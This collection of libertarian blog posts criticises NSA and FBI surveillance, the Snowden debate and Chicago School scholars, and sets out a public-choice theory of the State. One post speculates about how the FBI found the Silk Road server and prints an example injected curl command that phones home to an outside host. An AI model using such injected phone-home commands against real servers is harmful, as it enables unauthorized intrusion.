Michael Hayden claims the enterprise of US Government surveillance has attained the status of the Madisonian Trifecta. Hmmm, sounds like a bad Robert Ludlum novel, or perhaps it’s just another name for The Firm.
Of course, as predicted.
In the 90s, I thought the internet presaged an era of unprecedented human liberty. Now I know better…
A few hours ago Wired published details of the FBI’s rebuttal to the previously filed Ross Ulbricht defense motion that proffered the State’s case necessarily rested on evidence obtained from illegal searches(read: NSA dragnetting). The gist:
In the latest filing, however, former FBI agent Christopher Tarbell counters Ulbricht’s defense by describing just how he and another FBI agent located the Silk Road server in June of last year without any sophisticated intrusion: Instead, he says, they found a misconfiguration in an element of the Silk Road login page, which revealed its internet protocol (IP) address and thus its physical location.
As they typed “miscellaneous” strings of characters into the login page’s entry fields, Tarbell writes that they noticed an IP address associated with some data returned by the site didn’t match any known Tor “nodes,” the computers that bounce information through Tor’s anonymity network to obscure its true source. And when they entered that IP address directly into a browser, the Silk Road’s CAPTCHA prompt appeared, the garbled-letter image designed to prevent spam bots from entering the site.
The actual technical claim: Arbitrary HTTP Posts to the login form action leaked the Server’s Internet Protocol Address in the Response Headers and/or data payload.
Probability of said claim: Assuming Ulbricht(and the chain of ownership that preceded him) not to be idiots of the first order, ~0. The only likely “misconfiguration” would be the typical default configuration, which is to “leak” the web server and OS type/version in the response headers.
If we assume the FBI letter to be a half-truth, which frankly is not necessarily a reasonable presumption to make(as opposed to, say, the outright lie), we can ascertain a more accurate technical translation:
We sent a malicious string in the request body of a login submission to inject an executable code payload, $ curl http://laundry.forensics.fbi.gov, which essentially allowed to us to perform a remote drive-by phone home on the target.
Now, if we assume the half-truthiness of the FBI in this matter, we can thusly deduce a methodology of counter-attack by US intel organs against network obfuscation techniques–namely directly attacking the target at the application layer. In other words, the use of buffer overflow exploits(maybe zero-day or not) on the target itself to perform drive-by phone homes, or in a more sophisticated attack, to install a wiretap implementation.
Going forward, one has to assume that the use of “cyber-hacking” as means to facilitate a court-approved wiretap will be deemed legal in much the same way breaking into your property to install the old-fashioned wiretaps was deemed legally proper. Of course, I would be remiss not to point out that the legal sanctification of State hacking by organs of the justice department provides a very convenient laundromat for laundering the legality of any data collected by the 3-hop graphical dragnet(read: NSA).
Finally, it should be noted that it’s not surprising the State would eventually seize on this vector of attack. Since 1988(the infamous morris worm), it is been well-known that the weakness of the internet was not in the layered protocol design itself but in the client-server software implementation of the protocol standards. In particular, the c and c++ languages are susceptible to memory violations in string operations against arbitrary data length, resulting in access violations that can produce malicious results if the violating data is carefully formatted to do exactly that. In a sense, it is enough a problem that it could have killed the internet from the start if not for a sort of spontaneous, heuristic security best practices regime that arose that limited the problem of rogue actors to a tolerable one.
But if the heuristic law saved the internet, it is the “rule of law” that will surely kill it(in terms of being a utopian instrument). For it is the latter which turns software vulnerabilities into a primary means of both wiretapping targets and laundering graphical dragnets, reminding us, once again, that the State is indeed its own agency and its preservation best executed by a type of competitive agency of invasion of the body snatchers.
No one is beyond the reach of the FBI. We will find you.
FBI statement on the arrest of radical libertarian, Dread Pirate Roberts
Periodically, the question of the US as a totalitarian police state is taken up by respectable company that unfailingly use the open consideration of the question itself as immediate evidence to the contrary. Indeed, those who may argue the point are often dismissed as undesirable rift-raft endangering libertarian respectability among the people who count.
But I think the FBI perhaps has finally put this debate to rest. They obviously view themselves as having totalitarian power and authority to the point of openly bragging about it. Given the current context of NSA revelations, this type of braggadocio illustrates a state apparatus quite comfortable with a perceived reality that either no one cares or there is not a god damned thing they can do about it if they do.
So, as they say, straight from the horses mouth.
That the NSA has now commenced with overt pressure campaigns to countermand any legislative effort to curtail its vast surveillance enterprise cements an obvious liberal dilemma regarding the agency of the State. Make no mistake, totalitarian spying exemplifies an agency whose ends are in competition with the ends of its own citizens. This is a fatal violation of the liberal paradigm out in the open, staring you right in the face.
The germane question which moves to the fore of consideration hence pertains to the extent of government surveillance. Is it indeed totalitarian? If we were to constrain the scope of consideration strictly to the NSA itself, then the answer would probably be no. It’s modus operandi does not follow the traditional taxonomy of the textbook totalitarian spymaster. However, thanks to the documentation leaked by Edward Snowden, what we have now is confirmation of the cypherpunk dystopian model, which in a real sense, is much worse, for it portends a sustainable template of planetary social control. The NSA in and of itself is one thing. However, in the larger context of its coerced “strategic partnerships” with the top US internet & software companies–as means to facilitate/execute the data collection requirements–what we end up with is quite another: the equivalent of a libcap library on every one of your network devices persistently cataloging your “matrix” in the well-connected social graph, built and maintained under the “legal auspices” of a three-hop dragnet.
In light of the Snowden revelations, the NSA has embarked on the aforementioned pressure and information campaign to countermand the PR damage. Just yesterday, the NSA released two documents that purport to dispel the notion of it being an agency of totalitarian collection. Having just read them , I can say that the 1.6% statistic of “touched traffic” and 0.025% statistic of “reviewed traffic”, on a daily basis, are highly misleading. The first hoodwink is to point out that out of the exabyte daily traffic volume, roughly 60%-70% is ip video traffic1, which shrinks our “basketball court” down to the size of a racquetball court. The second hoodwink is to infer the sampling follows a pattern of independent random trials–in the classic stats model, proving or disproving a hypothesis drawn from such a random sample–instead of what it actually is: the accumulation of a graph-based document store enabling a traversable, retrospective query system. The whole thing is just plain subterfuge.
By now, it should be apparent that I consider the cypherpunks to be the most relevant social scientists of our day. In no small part because they are at the forefront of the battle-lines of 21st century political economy. Assange, for one, has been singularly confirmed on a number of points. In particular, the US reaction of “Insider Threat” has to count as spectacular confirmation of his thesis of “conspiracy and networks.” The kernel of differentiated political and economic jurisdiction that always lurked beneath the rationale of wikileaks now seems obvious in light of what is required for secure and autonomous cloud computing platforms going forward2. Assange’s contention that legal and regulatory entities were engaging in data-laundering–that is, ex post manufacturing legal reconstructions of “evidence” gathered from the NSA dragnet spying enterprise–has since been confirmed by Reuters with respect to two agencies: the DEA and the IRS.
In contrast, the “liberal” political and academic establishment are dinosaurs. No better example of this than this piece at “Bleeding Heart Libertarians,” The United States is not a Police State. The entire piece is a confirmation of my (quite prescient, as it turns out) old post, Free Market Fairness: A bridge to nowhere. Fernando Teson’s entire argument boils down to the position that truth should never stand in the way of mainstream recognition. Of course, as I pointed out in that earlier post, the “respectable libertarian formulation,” in the form of the chicago school, had held sway for thirty years in the domain of finance and “regulatory reform” leading to nothing but banking oligarchy and a permanent severance of political freedom from capitalism. As I pointed out at the end, all it would take would be a minority dissident faction to blow that entire thesis to smithereens and force the “bleeding hearts” to side with what everyone and their brother–outside of polite academic company–knew to be tyranny and oppression. I’m not surprised “Edward Snowden” doesn’t appear in any post on that site, outside one inclusion in an obscure link.
Frankly, the boogeyman of North Korea is tiresome as the singleton measuring stick of totalitarianism. For starters, the inquisitive person might ask just how long North Korea would last if not for China and the US directly and indirectly propping it up(which should trigger a deeper discussion of the taxonomy to begin with when considering States that prop up even worse monsters). However, the better question might be why the persistent singleton casting of 21st century totalitarianism in the mold of mid-20th century soviet model when that model–in terms of having any sphere of international influence–died out two decades ago?
In the recent book, “Cypherpunks: Freedom & The Future Of The Internet,” Andy Muller-Maguhn specifically outlines the stated intent of our 21st century spooks: the use of secrecy as a means to gain control of social processes. This presents a countervailing agency problem more along the lines of a “squishy totalitarianism,” but this is more than sufficient to eviscerate the liberal paradigm. In fact, it acquires a particular sinister aura because it appears quite apparent that most are quite comfortable persisting the liberal mythology within its confines. The industries of “social justice” and “the invisible hand of market social coordination” will continue to spit out oblivious drivel because after all, they are “industries.”
As I have noted on previous occasions, the planned order or surveillance introduces a potentially glaring incentive-incompatibility agency problem into market exchange. One that makes mincemeat of any position that uses the existence of markets as an immediate counterfactual to any claim of systems of social control. If we cast “spontaneous order” as a type of “social graph” and then analytically run it against the “planned order of surveillance” that exists to anatomize it, we obtain a “second-order dynamic” between the social graph and its surveillance that illuminates the distinction between laissez-faire and capitalism in a far greater clarity than the dinosaur methods of 20th century classical liberalism still mired in the roots of the socialist calculation debates.
Frankly, to avoid serious methodological error, one should start from the assumption of “the State as its own Agency.” Everything else flows from there…
1 As I pointed out in this old post, Technology is not Freedom, ip video has its own extensive surveillance regime.
2 Ideological preferences aside, the cloud, in any rent-seeking context, is where the internet goes because it is simply a much more efficient computing platform.
“You know, for us, this would have been a dream come true.”
Former Lieutenant Colonel in The East German Stasi, referring to the NSA Spying Apparatus
From a simple, straightforward, technical legal standpoint, there’s absolutely no question that Snowden violated the law.
Why I think he deserves punishment? …Well, the fact is, Snowden’s just an ordinary guy with absolutely no expertise in public policy, in the law, in national security. He’s a techie. He made the decision on his own, without any authorization, without any approval by the American people, to reveal classified information about which he had absolutely no expertise in terms of the danger to the nation, the value of the information to national security.
Geoffrey Stone, Chicago Law School
McClatchy recently published an interesting interview with Wolfgang Schmidt, a former East German Stasi officer, where Schmidt, in between waxing a certain admiration for current NSA surveillance capability, issued an obvious warning:
“It is the height of naiveté to think that once collected this information won’t be used. This is the nature of secret government organizations. The only way to protect the people’s privacy is not to allow the government to collect their information in the first place.”
To me, this qualifies our former east german officer as more liberal, or least more cognizant of a liberal methodology, than our esteemed scholars of official classical liberal orthodoxy represented by the Chicago School here in the United States. To wit, this recent drivel penned by Richard Epstein. Recall the likes of Peter Boettke once proclaimed Richard Epstein the sharpest libertarian thinker alive. At the time, I responded with this, which more or less summarized a case why if that were so, then we were accordingly fucked. Now Epstein himself labors to conclusively demonstrate the point.
Now to Geoffrey Stone. Stone uttered the above prefatory quote in a debate with Chris Hedges on Democracy Now. Stone’s position more or less is that Snowden’s actions were prima facie criminal and Snowden lacked sufficient qualification to determine if his actions would actually serve the public interest. This, of course, is an attack on both Snowden’s actions and motives. The easy rejoinder to Stone need not appeal to any higher moral principle but simply unravel the loosely tied knot of Stone’s own sheer hypocrisy. The prima facie criminality argument fails the “second-blush” inspection test because there is a de facto “prescriptive custom” in place that every day excuses leaking of classified information if such leakage is deemed to be in the “national interest.” Since Stone has never publicly called for a criminal crackdown on this prescriptive custom, a custom that more or less overrides the de jure letter of the written code, he, at the very least, implicitly accepts it. So, Stone’s prima facie criminality argument is a dishonest one.
The second part of Stone’s case is really the crux of his argument: Snowden is not qualified to determine if his actions served the public interest, hence he should be punished. However, I would contend that the construction of the argument begs an illiberal premise that renders any conclusion irrelevant to the liberal mind. I simply reject the premise that Stone or his like-minded colleagues are the arbiters of “public interest.” To accept that premise would be to concede a more generalized argument that the you and I are not qualified to know what our own interests are. This putrid argument from authority is particularly laughable in this particular case given that Stone is a technological ignoramus who–on this matter– carries all the authority of a certified clown(apologies to Penn Jillette).
Frankly, the question of “national interest” is an impossible one to answer. Like “social justice,” it’s a fake abstraction. What is answerable, however, is what is not in the public interest. In an earlier interview, Stone asserted we had to accept “total surveillance” to avoid the likelihood of a worse alternative of permanent martial law. I would counter that a system of governance that offered a choice between total surveillance and martial law is one that serves only the interests of the few and not worth protecting.
Stone and Epstein are professionally linked as collaborative editors of this early 1990s volume, The Bill of Rights in the Modern State. A contemporaneous edition of that volume would now arbitrate a consensus of “be happy with what you’re granted, it could get–indeed it is likely to get–much worse.” A consensus predicated on argument from secret authority, reassurances of procedural technicalities as sufficient protections and dismissal of dissent on the grounds of loony endangerment to national security. Call this what you may, but it ain’t liberalism.
Frankly, I’m not surprised by the descent of these two pillars of “the Chicago School” into outright authoritarianism, or squishy totalitarianism, if you prefer. For some time it has been evident that Milton Friedman’s aphorism of Capitalism to Freedom was not only flawed but fatally severed. What remains standing is political economy as an instrument of social control. If Jeremy Bentham is credited as the first designer of the panopticon, Richard Epstein and the Chicago School are only fulfilling the tradition that they inherit from.
“How Disclosed NSA Programs Protect Americans, and Why Disclosure Aids Our Adversaries”
The official title of the recent and rare public US House Select Committee on Intelligence oversight hearing of the NSA
For the past three years, I have used this blog as a forum(to an admittedly limited readership) to rail against the security state. A particular gripe has been that while the admission of the thing has always been acknowledged the violation it constituted nonetheless usually remained outside the purview of consideration.1 At best, the violation may have been treated as a secondary or tertiary one. But this dereliction(of intellectual method) can no longer stand. The past two weeks, Edward Snowden, a NSA contractor, has now verifiably leaked what has hitherto been the elephant in the room: the totalitarian US surveillance enterprise.
And make no mistake, it is an enterprise. I call it The Firm, borrowing heavily from Anthony de Jasay’s heterodoxical method of Rational Choice that treats the State as a type of unitary actor2. But the Firm encompasses more than the what is traditionally thought to mean by the State. It stretches across an integrated nexus of political economy, media, academia, ingraining itself into every institution of civil society. As I have previously stated, the Firm is a rational choice casting of libertarian class theory.
The key insight of LCT–in contradistinction to liberal social contract theory–is that the State and civil society are in conflict. Liberalism holds that the State is an artificial construct to secure civil societal ends. However, practice has demonstrated that the State instead serves to subvert societal institutions, using them as “natural hosts” to effectuate an artificial process of political economy. Borrowing from Bastiat, we might depict this a the transformation of law as an instrument of justice(specifically, as the correction of injustice) to one of a perpetuation of injustice(plunder). The division of class then refers to those who depend on this perpetuation of injustice(or benefit from it) vs those who do not3.
In the jargon of rational choice, we would cast LCT as the “incentive-incompatibility problem” of collective choice to abide by the “unanimity” of the so-called social contact. In plain terms, this simply means that “constitutions” are not rational constraints against the rule-making power or authority of the State. If we dispense with this myth, then we can begin to actually examine the actual rational pattern of collective choice. What we often find is a hierarchical organization pattern serving as a de-facto decision-making rule. In public choice, a decision-making rule is the type of collective action method that imposes the decision-making costs(the price we pay for civilization) for participation in organized society. For Buchanan and Tullock, the only legitimate decision-making rule is unanimity4. In practice, this means super-majoritarian constitutional rules and amendments are the only legitimate decision-making rules.
In the original “Calculus of Consent,” side payments create marketable property rights in voting which often mitigate the external and decision-making costs of legislative action. However, later developments in the theory by Tullock advanced the idea of “rent-seeking” and the all pay auction at the methodological core of treating government/politics like a market. This rent-seeking game, however, can be very wasteful–in theory, infinitely wasteful. So, following Oliver Williamson’s treatment of The Firm–firms are DROs that arise as institutional mechanisms to mitigate wasteful bargaining costs–firms arise in political competition as means to fray the wasteful costs of the Tullock rent-seeking game5. This introduces the Firm as potential method of collective action. If we can identify high external costs of a firm’s rule making that nonetheless remain impervious to correction or reform, then we can explain this by treating these costs as decision-making costs. This would then gives us the Firm as a decision-making rule. And the Firm as a decision-making rule gives us “the State as its own Agency.”
Empirically, a firm can be demonstrated via a rent-seeking condition of rents >> outlays within a given market sector(of political economy). However, to show the Firm is not sufficient to show a decision-making rule.6 For this, we have to demonstrate external costs of the Firm equate to decision-making costs. A clear way to demonstrate this is to show a rule which overrides one derived from a legitimate decision-making rule. Put differently, showing enforcement of a firm’s rule that is blatantly unconstitutional is sufficient to show that firm as a decision-making rule.
For example, the public choice method excludes a statement such as “total surveillance is the price we must pay for the security to participate in organized society” because total surveillance overrides a number of rules derived from a legitimate decision-making rule, the unanimity of the bill of rights. To treat these costs as external costs is contra the public choice method because these costs are, in fact, decision-making ones. Now public choice per se certainly does not exclude legislative actions from imposing decision-making costs(if the decision-making rule is a simple majority system, then this is to be expected), but the standard method encounters an agency problem in explaining how decision-making costs are passed off as external costs to thwart a decision-making rule rooted in unanimity. Particularly, if this agency exhibits a concerted, coordinated organization pattern that encompasses military and intelligence organs, congressional leaders, the Dept. of Justice, media and journalistic organs, tech, telecommunication and defense industry sectors, political science academia and the like, etc. The agency problem is further compounded by an apparent legality established by secret courts, the public disclosure of such carrying a penalty of “aiding the enemy” and espionage. This is a vexing problem for standard public choice theory because there is a manifest agency afoot that appears to equate the public to “the enemy.”
The NSA as a Decision-Making Rule
Now let us return to Edward Snowden. What Snowden actually discovered amounted to a NSA/Intel decision-making rule. However, Snowden’s documentation trove, when fully revealed, will elucidate just how much of these rules are actually oriented around enforcing a 21st century mercantilist political economy rooted in data analytics(which I have dubbed “The Fifth Monopoly”). The so-called “liberty vs security trade-off debate” is a phony one. The decision-making cost is not this:
total surveillance is the price we must pay for the security to participate in organized society
Rather, it is this:
total surveillance is the price we must pay for the operational security of American dominance and control of the global political economy of data analytics
The latter is a decision-making cost that can only be implemented by decision-making rule such as the NSA. If we go by Russ Tice, a noted NSA whistleblower from the Bush tenure, the NSA, for all intents and purposes, is now the agency of the US government. This would put the US as a full-blown secret intelligence State.
The method of The Firm is an anathema to the traditional classical liberal schools of Chicago and Virginia because of the inversion of Milton Friedman’s famous relationship regarding capitalism and freedom. Capitalism is a necessary(though not sufficient) condition for political freedom. The Firm, however, employs a method that predicts a rent-seeking pattern that will eventually produce a decision-making rule that will displace legitimate decision-making rules rooted in unanimity. The Firm’s succinct relationship motto: Capitalism is a sufficient(though not necessary) condition to destroy liberal political freedom.
Still, one may ask how can capitalism result in a totalitarian regime of social control? Perhaps this short answer: when you stop being the customer and instead become the product itself. But “why” is not really the pertinent question here. Rather, the pertinent question is “why not”? From “incentive-incompatibility problem” of collective choice outlined above, there is no reliable “why not” constraint.
1 for the most part, radical libertarianism excluded
2 The Firm differs a bit from de Jasay’s account in that the former is squarely rooted in public choice, which is a narrower subset of rational choice. But the conclusions derived from each are more or less identical.
3IMHO, Class Theory is only a coherent methodological tool when it is institutionalized, i.e., classes are cast in institutional terms. In this sense we would say there are a class of institutions, or an institutional arrangement, that is entirely dependent on an artificial process of political economy, without which, it would disappear literally overnight.
4 Unanimity is required because of the potentially high external costs of collective action. By definition, an external cost is that cost to a party who did not choose to incur that cost. Unanimity ensures the cost is thus a decision-making one and not an external one. In other words, unanimity ensures “consent.”
5 Theoretically, Firms are a difficult thing to explain. But empirically, they obviously exist and are a fundamental organizational unit of market rent-seeking. It is simply not plausible to acknowledge them in free-market competition but deny them in political competition. Its not a defensible position(that is, there is no rational argument that necessarily explains them away in political competition, particularly given the difficulty of a rational argument to begin with to explain their existence in a free market). Legal distinctions/arguments are a red herring.In political competition they may not take the form of a de jure entity, but they are nonetheless, a de facto one.
6 Tullock himself had wrestled with the apparent persistence of Firms in (political) rent-seeking and succeeded in partially explaining them away by resorting to intellectual gymnastics vis-a-vis the efficiency of the rent-seeking technology. However, the persistent of firms would only be treated as an anomaly, and its attendent costs viewed primarily as external. The anomaly perhaps existentially threatened the validity of public choice as a method, but the threat was not viewed as something that extended to liberal democracy itself.